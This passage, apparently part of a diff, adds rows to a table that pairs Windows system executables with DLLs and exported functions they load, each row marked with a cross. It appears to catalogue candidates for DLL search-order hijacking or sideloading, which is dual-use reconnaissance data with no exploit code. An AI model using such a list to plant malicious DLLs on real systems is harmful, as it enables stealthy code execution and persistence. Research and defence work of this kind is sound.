omadmapi.dll | FreeCommandLineOptions | +| ❌ | omadmclient.exe | omadmapi.dll | OmaDmGetInternalAcctID | +| ❌ | omadmclient.exe | omadmapi.dll | ProcessCommandLine | +| ❌ | omadmclient.exe | policymanager.dll | DllMain | +| ❌ | omadmclient.exe | USERENV.dll | DllMain | +| ❌ | omadmclient.exe | XmlLite.dll | DllMain | +| ❌ | openfiles.exe | netutils.dll | DllMain | +| ❌ | openfiles.exe | srvcli.dll | DllMain | +| ❌ | openfiles.exe | SspiCli.dll | DllMain | +| ❌ | osk.exe | AUDIOSES.DLL | DllMain | +| ❌ | osk.exe | AVRT.dll | DllMain | +| ❌ | osk.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | osk.exe | DEVOBJ.dll | DllMain | +| ❌ | osk.exe | dwmapi.dll | DllMain | +| ❌ | osk.exe | dwmapi.dll | DwmIsCompositionEnabled | +| ❌ | osk.exe | dwmapi.dll | DwmSetWindowAttribute | +| ❌ | osk.exe | ksuser.dll | DllMain | +| ❌ | osk.exe | midimap.dll | DllMain | +| ❌ | osk.exe | midimap.dll | DriverProc | +| ❌ | osk.exe | MMDevAPI.DLL | DllMain | +| ❌ | osk.exe | MSACM32.dll | acmGetVersion | +| ❌ | osk.exe | MSACM32.dll | DllMain | +| ❌ | osk.exe | OLEACC.dll | AccessibleObjectFromWindowTimeout | +| ❌ | osk.exe | OLEACC.dll | AccSetRunningUtilityState | +| ❌ | osk.exe | OLEACC.dll | DllMain | +| ❌ | osk.exe | OLEACC.dll | GetProcessHandleFromHwnd | +| ❌ | osk.exe | OskSupport.dll | DllMain | +| ❌ | osk.exe | OskSupport.dll | InitializeOSKSupport | +| ❌ | osk.exe | OskSupport.dll | UninitializeOSKSupport | +| ❌ | osk.exe | WindowsCodecs.dll | DllMain | +| ❌ | osk.exe | WindowsCodecs.dll | WICCreateImagingFactory\_Proxy | +| ❌ | osk.exe | WMsgAPI.dll | DllMain | +| ❌ | pacjsworker.exe | WINHTTP.dll | DllMain | +| ❌ | packageinspector.exe | msi.dll | DllMain | +| ❌ | packageinspector.exe | SLC.dll | DllMain | +| ❌ | packageinspector.exe | SLC.dll | SLGetWindowsInformationDWORD | +| ❌ | packageinspector.exe | sppc.dll | DllMain | +| ❌ | packageinspector.exe | wevtapi.dll | DllMain | +| ❌ | pathping.exe | IPHLPAPI.DLL | DllMain | +| ❌ | pcalua.exe | pcaui.dll | DllMain | +| ❌ | pcalua.exe | wer.dll | DllMain | +| ❌ | pinenrollmentbroker.exe | PROPSYS.dll | DllMain | +| ❌ | pinenrollmentbroker.exe | SspiCli.dll | DllMain | +| ❌ | pktmon.exe | mintdh.dll | DllMain | +| ❌ | pktmon.exe | mintdh.dll | TdhpSetWbemExtensionBlock | +| ❌ | plasrv.exe | Cabinet.dll | DllMain | +| ❌ | plasrv.exe | mintdh.dll | DllMain | +| ❌ | plasrv.exe | mintdh.dll | TdhpSetWbemExtensionBlock | +| ❌ | plasrv.exe | pdh.dll | DllMain | +| ❌ | plasrv.exe | tdh.dll | DllMain | +| ❌ | plasrv.exe | wevtapi.dll | DllMain | +| ❌ | pnpunattend.exe | dbgcore.DLL | DllMain | +| ❌ | pnpunattend.exe | DEVRTL.dll | DllMain | +| ❌ | pnpunattend.exe | newdev.dll | DllMain | +| ❌ | pnpunattend.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | pnpunattend.exe | wdscore.dll | CurrentIP | +| ❌ | pnpunattend.exe | wdscore.dll | DllMain | +| ❌ | pnpunattend.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | pnpunattend.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | pnpunattend.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | presentationhost.exe | CRYPTBASE.DLL | DllMain | +| ❌ | presentationhost.exe | mscoree.dll | CorExitProcess | +| ❌ | presentationhost.exe | mscoree.dll | DllMain | +| ❌ | presentationhost.exe | WININET.dll | DllMain | +| ❌ | presentationsettings.exe | SspiCli.dll | DllMain | +| ❌ | presentationsettings.exe | SspiCli.dll | GetUserNameExW | +| ❌ | printbrmui.exe | IPHLPAPI.DLL | DllMain | +| ❌ | printbrmui.exe | PROPSYS.dll | DllMain | +| ❌ | psr.exe | AEPIC.dll | DllMain | +| ❌ | psr.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | psr.exe | CLDAPI.dll | DllMain | +| ❌ | psr.exe | FLTLIB.DLL | DllMain | +| ❌ | psr.exe | HID.DLL | DllMain | +| ❌ | psr.exe | msdrm.dll | DllMain | +| ❌ | psr.exe | OLEACC.dll | DllMain | +| ❌ | psr.exe | SspiCli.dll | DllMain | +| ❌ | psr.exe | SspiCli.dll | GetUserNameExW | +| ❌ | psr.exe | uireng.dll | DllMain | +| ❌ | psr.exe | uireng.dll | UirInitializeEngine | +| ❌ | psr.exe | XmlLite.dll | DllMain | +| ❌ | query.exe | logoncli.dll | DllMain | +| ❌ | query.exe | netutils.dll | DllMain | +| ❌ | query.exe | REGAPI.dll | DllMain | +| ❌ | query.exe | REGAPI.dll | RegQueryUtilityCommandList | +| ❌ | query.exe | samcli.dll | DllMain | +| ❌ | query.exe | srvcli.dll | DllMain | +| ❌ | query.exe | utildll.dll | DllMain | +| ❌ | query.exe | WINSTA.dll | DllMain | +| ❌ | quickassist.exe | ATL.DLL | AtlComPtrAssign | +| ❌ | quickassist.exe | ATL.DLL | DllMain | +| ❌ | quickassist.exe | CRYPTBASE.DLL | DllMain | +| ❌ | quickassist.exe | CRYPTBASE.DLL | SystemFunction036 | +| ❌ | quickassist.exe | d2d1.dll | DllMain | +| ❌ | quickassist.exe | d3d11.dll | DllMain | +| ❌ | quickassist.exe | dcomp.dll | DllMain | +| ❌ | quickassist.exe | dxgi.dll | DllMain | +| ❌ | quickassist.exe | PROPSYS.dll | DllMain | +| ❌ | quickassist.exe | PROPSYS.dll | VariantToStringWithDefault | +| ❌ | quickassist.exe | SAS.dll | DllMain | +| ❌ | quickassist.exe | SspiCli.dll | AcquireCredentialsHandleA | +| ❌ | quickassist.exe | SspiCli.dll | DllMain | +| ❌ | quickassist.exe | SspiCli.dll | GetUserNameExA | +| ❌ | quickassist.exe | SspiCli.dll | GetUserNameExW | +| ❌ | quickassist.exe | SspiCli.dll | InitializeSecurityContextA | +| ❌ | quickassist.exe | SspiCli.dll | QueryContextAttributesExA | +| ❌ | quickassist.exe | UxTheme.dll | DllMain | +| ❌ | quickassist.exe | UxTheme.dll | SetWindowThemeAttribute | +| ❌ | quickassist.exe | WindowsCodecs.dll | DllMain | +| ❌ | quickassist.exe | WININET.dll | AppCacheGetGroupList | +| ❌ | quickassist.exe | WININET.dll | DllMain | +| ❌ | quickassist.exe | WININET.dll | InternetInitializeAutoProxyDll | +| ❌ | quickassist.exe | WININET.dll | InternetOpenW | +| ❌ | quickassist.exe | WININET.dll | InternetSetOptionW | +| ❌ | quser.exe | logoncli.dll | DllMain | +| ❌ | quser.exe | netutils.dll | DllMain | +| ❌ | quser.exe | samcli.dll | DllMain | +| ❌ | quser.exe | srvcli.dll | DllMain | +| ❌ | quser.exe | UTILDLL.dll | DllMain | +| ❌ | quser.exe | UTILDLL.dll | StrConnectState | +| ❌ | quser.exe | WINSTA.dll | DllMain | +| ❌ | quser.exe | WINSTA.dll | WinStationEnumerateW | +| ❌ | qwinsta.exe | logoncli.dll | DllMain | +| ❌ | qwinsta.exe | netutils.dll | DllMain | +| ❌ | qwinsta.exe | samcli.dll | DllMain | +| ❌ | qwinsta.exe | srvcli.dll | DllMain | +| ❌ | qwinsta.exe | UTILDLL.dll | DllMain | +| ❌ | qwinsta.exe | UTILDLL.dll | StrConnectState | +| ❌ | qwinsta.exe | WINSTA.dll | DllMain | +| ❌ | qwinsta.exe | WINSTA.dll | WinStationEnumerateW | +| ❌ | rasautou.exe | MPRAPI.dll | DllMain | +| ❌ | rasautou.exe | rasman.dll | DllMain | +| ❌ | rasautou.exe | rtutils.dll | DllMain | +| ❌ | rasdial.exe | RASAPI32.dll | DllMain | +| ❌ | rasdial.exe | RASAPI32.dll | RasCompleteDialMachineCleanup | +| ❌ | rasdial.exe | RASAPI32.dll | RasEnumConnectionsW | +| ❌ | rasdial.exe | rasman.dll | DllMain | +| ❌ | rasdial.exe | rasman.dll | RasConnectionEnum | +| ❌ | rasdial.exe | rasman.dll | RasInitialize | +| ❌ | rasdial.exe | rtutils.dll | DllMain | +| ❌ | rasdial.exe | rtutils.dll | TracePrintfExA | +| ❌ | rasdial.exe | rtutils.dll | TraceRegisterExA | +| ❌ | raserver.exe | netutils.dll | DllMain | +| ❌ | raserver.exe | samcli.dll | DllMain | +| ❌ | raserver.exe | WTSAPI32.dll | DllMain | +| ❌ | rdpclip.exe | CRYPTBASE.DLL | DllMain | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjEnumDeviceInfo | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjEnumDeviceInterfaces | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjGetDeviceInfoListDetail | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjGetDeviceInterfaceDetail | +| ❌ | rdpclip.exe | DEVOBJ.dll | DllMain | +| ❌ | rdpclip.exe | dwmapi.dll | DllMain | +| ❌ | rdpclip.exe | IPHLPAPI.DLL | DllMain | +| ❌ | rdpclip.exe | PROPSYS.dll | DllMain | +| ❌ | rdpclip.exe | srpapi.dll | DllMain | +| ❌ | rdpclip.exe | WINSTA.dll | DllMain | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationNameFromLogonIdW | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationQueryInformationW | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationRegisterConsoleNotification | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationVirtualOpenEx | +| ❌ | rdpclip.exe | WTSAPI32.dll | DllMain | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSQuerySessionInformationW | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSRegisterSessionNotification | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSVirtualChannelOpen | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSVirtualChannelOpenEx | +| ❌ | rdpsa.exe | SspiCli.dll | DllMain | +| ❌ | rdpsa.exe | WINSTA.dll | DllMain | +| ❌ | rdpsauachelper.exe | WINSTA.dll | DllMain | +| ❌ | rdpsauachelper.exe | WINSTA.dll | WinStationGetAllProcesses | +| ❌ | rdpshell.exe | dwmapi.dll | DllMain | +| ❌ | rdpshell.exe | WINSTA.dll | DllMain | +| ❌ | rdpshell.exe | WINSTA.dll | WinStationGetConnectionProperty | +| ❌ | rdpshell.exe | WTSAPI32.dll | DllMain | +| ❌ | rdvghelper.exe | dwmapi.dll | DllMain | +| ❌ | rdvghelper.exe | WINSTA.dll | DllMain | +| ❌ | rdvghelper.exe | WINSTA.dll | WinStationRegisterConsoleNotification | +| ❌ | rdvghelper.exe | WTSAPI32.dll | DllMain | +| ❌ | rdvghelper.exe | WTSAPI32.dll | WTSRegisterSessionNotification | +| ❌ | reagentc.exe | Cabinet.dll | DllMain | +| ❌ | reagentc.exe | ReAgent.dll | DllMain | +| ❌ | reagentc.exe | ReAgent.dll | WinReGetError | +| ❌ | reagentc.exe | ReAgent.dll | WinReSetError | +| ❌ | recover.exe | DEVOBJ.dll | DllMain | +| ❌ | register-cimprovider.exe | miutils.dll | DllMain | +| ❌ | register-cimprovider.exe | prvdmofcomp.dll | CreateRegisterParameter | +| ❌ | register-cimprovider.exe | prvdmofcomp.dll | DllMain | +| ❌ | rekeywiz.exe | credui.dll | DllMain | +| ❌ | rekeywiz.exe | CRYPTBASE.DLL | DllMain | +| ❌ | rekeywiz.exe | CRYPTUI.dll | DllMain | +| ❌ | rekeywiz.exe | DSROLE.dll | DllMain | +| ❌ | rekeywiz.exe | DSROLE.dll | DsRoleGetPrimaryDomainInformation | +| ❌ | rekeywiz.exe | duser.dll | DllMain | +| ❌ | rekeywiz.exe | EFSADU.dll | DllMain | +| ❌ | rekeywiz.exe | EFSUTIL.dll | DllMain | +| ❌ | rekeywiz.exe | EFSUTIL.dll | EfsUtilApplyGroupPolicy | +| ❌ | rekeywiz.exe | FeClient.dll | DllMain | +| ❌ | rekeywiz.exe | logoncli.dll | DllMain | +| ❌ | rekeywiz.exe | netutils.dll | DllMain | +| ❌ | rekeywiz.exe | USERENV.dll | DllMain | +| ❌ | rekeywiz.exe | VAULTCLI.dll | DllMain | +| ❌ | relog.exe | pdh.dll | DllMain | +| ❌ | relpost.exe | Cabinet.dll | DllMain | +| ❌ | relpost.exe | ReAgent.dll | DllMain | +| ❌ | relpost.exe | wer.dll | DllMain | +| ❌ | repair-bde.exe | BDEREPAIR.dll | DllMain | +| ❌ | reset.exe | logoncli.dll | DllMain | +| ❌ | reset.exe | netutils.dll | DllMain | +| ❌ | reset.exe | REGAPI.dll | DllMain | +| ❌ | reset.exe | REGAPI.dll | RegQueryUtilityCommandList | +| ❌ | reset.exe | samcli.dll | DllMain | +| ❌ | reset.exe | srvcli.dll | DllMain | +| ❌ | reset.exe | utildll.dll | DllMain | +| ❌ | reset.exe | WINSTA.dll | DllMain | +| ❌ | resetengine.exe | bcd.dll | DllMain | +| ❌ | resetengine.exe | Cabinet.dll | DllMain | +| ❌ | resetengine.exe | DismApi.DLL | DllMain | +| ❌ | resetengine.exe | FVEAPI.dll | DllMain | +| ❌ | resetengine.exe | ReAgent.dll | DllMain | +| ❌ | resetengine.exe | ResetEngine.dll | DllMain | +| ❌ | resetengine.exe | tbs.dll | DllMain | +| ❌ | resetengine.exe | VSSAPI.DLL | DllMain | +| ❌ | resetengine.exe | VssTrace.DLL | DllMain | +| ❌ | resetengine.exe | WDSCORE.dll | DllMain | +| ❌ | resetengine.exe | WIMGAPI.DLL | DllMain | +| ❌ | resetengine.exe | WINHTTP.dll | DllMain | +| ❌ | resetengine.exe | WOFUTIL.dll | DllMain | +| ❌ | resetengine.exe | XmlLite.dll | DllMain | +| ❌ | resmon.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | resmon.exe | CLDAPI.dll | DllMain | +| ❌ | resmon.exe | CRYPTBASE.DLL | DllMain | +| ❌ | resmon.exe | edputil.dll | DllMain | +| ❌ | resmon.exe | edputil.dll | EdpGetIsManaged | +| ❌ | resmon.exe | FLTLIB.DLL | DllMain | +| ❌ | resmon.exe | PROPSYS.dll | DllMain | +| ❌ | resmon.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | resmon.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | rmactivate\_isv.exe | msdrm.dll | \_\_AddMachineCertToLicenseStore | +| ❌ | rmactivate\_isv.exe | msdrm.dll | DllMain | +| ❌ | rmactivate\_ssp\_isv.exe | CRYPTBASE.dll | DllMain | +| ❌ | rmactivate\_ssp\_isv.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | rmactivate.exe | CRYPTBASE.dll | DllMain | +| ❌ | rmactivate.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | rmactivate.exe | msdrm.dll | \_\_AddMachineCertToLicenseStore | +| ❌ | rmactivate.exe | msdrm.dll | DllMain | +| ❌ | rmttpmvscmgrsvr.exe | DEVOBJ.dll | DllMain | +| ❌ | route.exe | IPHLPAPI.DLL | DllMain | +| ❌ | rpcping.exe | credui.dll | DllMain | +| ❌ | rpcping.exe | SspiCli.dll | DllMain | +| ❌ | rpcping.exe | WINHTTP.dll | DllMain | +| ❌ | rwinsta.exe | logoncli.dll | DllMain | +| ❌ | rwinsta.exe | netutils.dll | DllMain | +| ❌ | rwinsta.exe | samcli.dll | DllMain | +| ❌ | rwinsta.exe | srvcli.dll | DllMain | +| ❌ | rwinsta.exe | utildll.dll | DllMain | +| ❌ | rwinsta.exe | WINSTA.dll | DllMain | +| ❌ | searchfilterhost.exe | TQUERY.DLL | DllMain | +| ❌ | secedit.exe | SCECLI.dll | DllMain | +| ❌ | securityhealthservice.exe | DNSAPI.dll | DllMain | +| ❌ | securityhealthservice.exe | FirewallAPI.dll | DllMain | +| ❌ | securityhealthservice.exe | fwbase.dll | DllMain | +| ❌ | securityhealthservice.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | securityhealthservice.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | securityhealthservice.exe | USERENV.dll | DllMain | +| ❌ | securityhealthservice.exe | Wldp.dll | DllMain | +| ❌ | securityhealthservice.exe | WTSAPI32.dll | DllMain | +| ❌ | settingsynchost.exe | policymanager.dll | DllMain | +| ❌ | settingsynchost.exe | PROPSYS.dll | DllMain | +| ❌ | settingsynchost.exe | USERENV.dll | DllMain | +| ❌ | setupugc.exe | dbgcore.DLL | DllMain | +| ❌ | setupugc.exe | DNSAPI.dll | DllMain | +| ❌ | setupugc.exe | WDSCORE.dll | ConstructPartialMsgVW | +| ❌ | setupugc.exe | WDSCORE.dll | CurrentIP | +| ❌ | setupugc.exe | WDSCORE.dll | DllMain | +| ❌ | setupugc.exe | WDSCORE.dll | WdsSetupLogDestroy | +| ❌ | setupugc.exe | WDSCORE.dll | WdsSetupLogInit | +| ❌ | setupugc.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ❌ | shutdown.exe | SspiCli.dll | DllMain | +| ❌ | slidetoshutdown.exe | d3d10warp.dll | DllMain | +| ❌ | slidetoshutdown.exe | d3d10warp.dll | OpenAdapter10\_2 | +| ❌ | slui.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | slui.exe | CLDAPI.dll | DllMain | +| ❌ | slui.exe | CRYPTBASE.DLL | DllMain | +| ❌ | slui.exe | edputil.dll | DllMain | +| ❌ | slui.exe | edputil.dll | EdpGetIsManaged | +| ❌ | slui.exe | FLTLIB.DLL | DllMain | +| ❌ | slui.exe | PROPSYS.dll | DllMain | +| ❌ | slui.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | slui.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | slui.exe | sppc.dll | DllMain | +| ❌ | slui.exe | WINBRAND.dll | DllMain | +| ❌ | slui.exe | WTSAPI32.dll | DllMain | +| ❌ | spaceagent.exe | NETUTILS.DLL | DllMain | +| ❌ | spaceagent.exe | SRVCLI.DLL | DllMain | +| ❌ | spectrum.exe | SpectrumSyncClient.dll | DllMain | +| ❌ | spoolsv.exe | DNSAPI.dll | DllMain | +| ❌ | sppextcomobj.exe | adsldpc.dll | DllMain | +| ❌ | sppextcomobj.exe | CRYPTBASE.dll | DllMain | +| ❌ | sppextcomobj.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | sppextcomobj.exe | DNSAPI.dll | DllMain | +| ❌ | sppsvc.exe | CRYPTXML.dll | DllMain | +| ❌ | sppsvc.exe | webservices.dll | DllMain | +| ❌ | sppsvc.exe | XmlLite.dll | DllMain | +| ❌ | srtasks.exe | bcd.dll | DllMain | +| ❌ | srtasks.exe | ktmw32.dll | DllMain | +| ❌ | srtasks.exe | SPP.dll | DllMain | +| ❌ | srtasks.exe | SRCLIENT.dll | DllMain | +| ❌ | srtasks.exe | SRCORE.dll | DllMain | +| ❌ | srtasks.exe | VSSAPI.DLL | DllMain | +| ❌ | srtasks.exe | VssTrace.DLL | DllMain | +| ❌ | srtasks.exe | wer.dll | DllMain | +| ❌ | stordiag.exe | CRYPTBASE.dll | DllMain | +| ❌ | stordiag.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | synchost.exe | PROPSYS.dll | DllMain | +| ❌ | sysreseterr.exe | WDSCORE.dll | DllMain | +| ❌ | systeminfo.exe | SspiCli.dll | DllMain | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjEnumDeviceInfo | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjEnumDeviceInterfaces | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjGetDeviceInfoListDetail | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjGetDeviceInterfaceDetail | +| ❌ | tabcal.exe | DEVOBJ.dll | DllMain | +| ❌ | tabcal.exe | HID.DLL | DllMain | +| ❌ | tabcal.exe | HID.DLL | HidD\_GetHidGuid | +| ❌ | tabcal.exe | NInput.dll | DllMain | +| ❌ | takeown.exe | SspiCli.dll | DllMain | +| ❌ | tapiunattend.exe | WDSCORE.dll | ConstructPartialMsgVW | +| ❌ | tapiunattend.exe | WDSCORE.dll | CurrentIP | +| ❌ | tapiunattend.exe | WDSCORE.dll | DllMain | +| ❌ | tapiunattend.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ❌ | tar.exe | archiveint.dll | archive\_match\_new | +| ❌ | tar.exe | archiveint.dll | DllMain | +| ❌ | taskkill.exe | dbghelp.dll | DllMain | +| ❌ | taskkill.exe | netutils.dll | DllMain | +| ❌ | taskkill.exe | srvcli.dll | DllMain | +| ❌ | taskkill.exe | SspiCli.dll | DllMain | +| ❌ | tasklist.exe | dbghelp.dll | DllMain | +| ❌ | tasklist.exe | netutils.dll | DllMain | +| ❌ | tasklist.exe | srvcli.dll | DllMain | +| ❌ | tasklist.exe | SspiCli.dll | DllMain | +| ❌ | tieringengineservice.exe | CLUSAPI.dll | DllMain | +| ❌ | tieringengineservice.exe | DNSAPI.dll | DllMain | +| ❌ | tieringengineservice.exe | ESENT.dll | DllMain | +| ❌ | tracert.exe | IPHLPAPI.DLL | DllMain | +| ❌ | tscon.exe | logoncli.dll | DllMain | +| ❌ | tscon.exe | netutils.dll | DllMain | +| ❌ | tscon.exe | samcli.dll | DllMain | +| ❌ | tscon.exe | srvcli.dll | DllMain | +| ❌ | tscon.exe | utildll.dll | DllMain | +| ❌ | tscon.exe | WINSTA.dll | DllMain | +| ❌ | tsdiscon.exe | WINSTA.dll | DllMain | +| ❌ | tsdiscon.exe | WINSTA.dll | WinStationNameFromLogonIdW | +| ❌ | tskill.exe | logoncli.dll | DllMain | +| ❌ | tskill.exe | netutils.dll | DllMain | +| ❌ | tskill.exe | samcli.dll | DllMain | +| ❌ | tskill.exe | srvcli.dll | DllMain | +| ❌ | tskill.exe | utildll.dll | DllMain | +| ❌ | tskill.exe | WINSTA.dll | DllMain | +| ❌ | tttracer.exe | TTDRecord.dll | DllMain | +| ❌ | tttracer.exe | USERENV.dll | DllMain | +| ❌ | typeperf.exe | pdh.dll | DllMain | +| ❌ | tzsync.exe | CRYPTBASE.dll | DllMain | +| ❌ | tzsync.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | uevappmonitor.exe | CRYPTBASE.dll | DllMain | +| ❌ | uevappmonitor.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | unlodctr.exe | loadperf.dll | DllMain | +| ❌ | upfc.exe | XmlLite.dll | DllMain | +| ❌ | upgraderesultsui.exe | DMCmnUtils.dll | DllMain | +| ❌ | useraccountcontrolsettings.exe | CRYPTBASE.dll | DllMain | +| ❌ | useraccountcontrolsettings.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | usocoreworker.exe | Cabinet.dll | DllMain | +| ❌ | usocoreworker.exe | DMCmnUtils.dll | DllMain | +| ❌ | usocoreworker.exe | dmiso8601utils.dll | DllMain | +| ❌ | usocoreworker.exe | DMOleAutUtils.dll | DllMain | +| ❌ | usocoreworker.exe | iri.dll | DllMain | +| ❌ | usocoreworker.exe | omadmapi.dll | DllMain | +| ❌ | usocoreworker.exe | UpdatePolicy.dll | DllMain | +| ❌ | usocoreworker.exe | XmlLite.dll | DllMain | +| ❌ | utcdecoderhost.exe | USERENV.dll | DllMain | +| ❌ | utilman.exe | OLEACC.dll | DllMain | +| ❌ | vaultcmd.exe | VAULTCLI.dll | DllMain | +| ❌ | vds.exe | ATL.DLL | AtlModuleInit | +| ❌ | vds.exe | ATL.DLL | AtlModuleTerm | +| ❌ | vds.exe | ATL.DLL | DllMain | +| ❌ | vds.exe | bcd.dll | DllMain | +| ❌ | vds.exe | OSUNINST.dll | DllMain | +| ❌ | vdsldr.exe | ATL.DLL | AtlModuleInit | +| ❌ | vdsldr.exe | ATL.DLL | AtlModuleRegisterClassObjects | +| ❌ | vdsldr.exe | ATL.DLL | DllMain | +| ❌ | vdsldr.exe | bcd.dll | DllMain | +| ❌ | vssadmin.exe | ATL.DLL | DllMain | +| ❌ | vssadmin.exe | VSSAPI.DLL | DllMain | +| ❌ | vssadmin.exe | VssTrace.DLL | DllMain | +| ❌ | vssadmin.exe | VssTrace.DLL | VssGetTracingContextPerThread | +| ❌ | vssadmin.exe | VssTrace.DLL | VssIsTracingEnabled | +| ❌ | vssadmin.exe | VssTrace.DLL | VssSetTracingContextPerThread | +| ❌ | vssadmin.exe | VssTrace.DLL | VssTraceInitialize | +| ❌ | vssadmin.exe | VssTrace.DLL | VssTraceUninitialize | +| ❌ | vssvc.exe | AUTHZ.dll | DllMain | +| ❌ | vssvc.exe | bcd.dll | DllMain | +| ❌ | vssvc.exe | DEVOBJ.dll | DllMain | +| ❌ | vssvc.exe | FLTLIB.DLL | DllMain | +| ❌ | vssvc.exe | VirtDisk.dll | DllMain | +| ❌ | vssvc.exe | VSSAPI.DLL | DllMain | +| ❌ | vssvc.exe | VssTrace.DLL | DllMain | +| ❌ | vssvc.exe | VssTrace.DLL | VssGetTracingContextPerThread | +| ❌ | vssvc.exe | VssTrace.DLL | VssIsTracingEnabled | +| ❌ | vssvc.exe | VssTrace.DLL | VssSetTracingContextPerThread | +| ❌ | vssvc.exe | VssTrace.DLL | VssTraceInitialize | +| ❌ | vssvc.exe | VssTrace.DLL | VssTraceUninitialize | +| ❌ | w32tm.exe | IPHLPAPI.DLL | DllMain | +| ❌ | w32tm.exe | logoncli.dll | DllMain | +| ❌ | w32tm.exe | netutils.dll | DllMain | +| ❌ | w32tm.exe | NTDSAPI.dll | DllMain | +| ❌ | waitfor.exe | netutils.dll | DllMain | +| ❌ | waitfor.exe | srvcli.dll | DllMain | +| ❌ | waitfor.exe | SspiCli.dll | DllMain | +| ❌ | wbadmin.exe | credui.dll | DllMain | +| ❌ | wbengine.exe | bcd.dll | DllMain | +| ❌ | wbengine.exe | CLUSAPI.dll | DllMain | +| ❌ | wbengine.exe | DNSAPI.dll | DllMain | +| ❌ | wbengine.exe | FLTLIB.DLL | DllMain | +| ❌ | wbengine.exe | NETUTILS.DLL | DllMain | +| ❌ | wbengine.exe | SPP.dll | DllMain | +| ❌ | wbengine.exe | SRVCLI.DLL | DllMain | +| ❌ | wbengine.exe | VirtDisk.dll | DllMain | +| ❌ | wbengine.exe | VSSAPI.DLL | DllMain | +| ❌ | wbengine.exe | VssTrace.DLL | DllMain | +| ❌ | wbengine.exe | wer.dll | DllMain | +| ❌ | wbengine.exe | XmlLite.dll | DllMain | +| ❌ | wecutil.exe | WecApi.dll | DllMain | +| ❌ | wecutil.exe | wevtapi.dll | DllMain | +| ❌ | werfault.exe | dbgcore.DLL | DllMain | +| ❌ | werfault.exe | faultrep.dll | DllMain | +| ❌ | werfault.exe | wer.dll | DllMain | +| ❌ | werfault.exe | wer.dll | WerpSetExitListeners | +| ❌ | werfaultsecure.exe | dbgcore.DLL | DllMain | +| ❌ | werfaultsecure.exe | faultrep.dll | DllMain | +| ❌ | werfaultsecure.exe | wer.dll | DllMain | +| ❌ | werfaultsecure.exe | wer.dll | WerpSetExitListeners | +| ❌ | wermgr.exe | wer.dll | DllMain | +| ❌ | wermgr.exe | wer.dll | WerpSetExitListeners | +| ❌ | wextract.exe | Cabinet.dll | DllMain | +| ❌ | wfs.exe | ATL.DLL | DllMain | +| ❌ | wfs.exe | credui.dll | DllMain | +| ❌ | wfs.exe | IPHLPAPI.DLL | DllMain | +| ❌ | wfs.exe | PROPSYS.dll | DllMain | +| ❌ | wfs.exe | UxTheme.dll | DllMain | +| ❌ | whoami.exe | AUTHZ.dll | DllMain | +| ❌ | whoami.exe | netutils.dll | DllMain | +| ❌ | whoami.exe | SspiCli.dll | DllMain | +| ❌ | whoami.exe | wkscli.dll | DllMain | +| ❌ | wiaacmgr.exe | ScanSetting.DLL | DllMain | +| ❌ | wiaacmgr.exe | UxTheme.dll | DllMain | +| ❌ | wiawow64.exe | ScanSetting.DLL | DllMain | +| ❌ | wiawow64.exe | UxTheme.dll | DllMain | +| ❌ | wifitask.exe | HTTPAPI.dll | DllMain | +| ❌ | wifitask.exe | IPHLPAPI.DLL | DllMain | +| ❌ | wifitask.exe | webservices.dll | DllMain | +| ❌ | wifitask.exe | wlanapi.dll | DllMain | +| ❌ | wimserv.exe | Cabinet.dll | DllMain | +| ❌ | winlogon.exe | UXINIT.dll | DllMain | +| ❌ | winlogon.exe | UXINIT.dll | ThemesOnTerminateSession | +| ❌ | winrs.exe | DSROLE.dll | DllMain | +| ❌ | winrs.exe | mi.dll | DllMain | +| ❌ | winrs.exe | miutils.dll | DllMain | +| ❌ | wkspbroker.exe | credui.dll | DllMain | +| ❌ | wkspbroker.exe | DNSAPI.dll | DllMain | +| ❌ | wkspbroker.exe | ktmw32.dll | DllMain | +| ❌ | wkspbroker.exe | PROPSYS.dll | DllMain | +| ❌ | wkspbroker.exe | RADCUI.dll | DllMain | +| ❌ | wkspbroker.exe 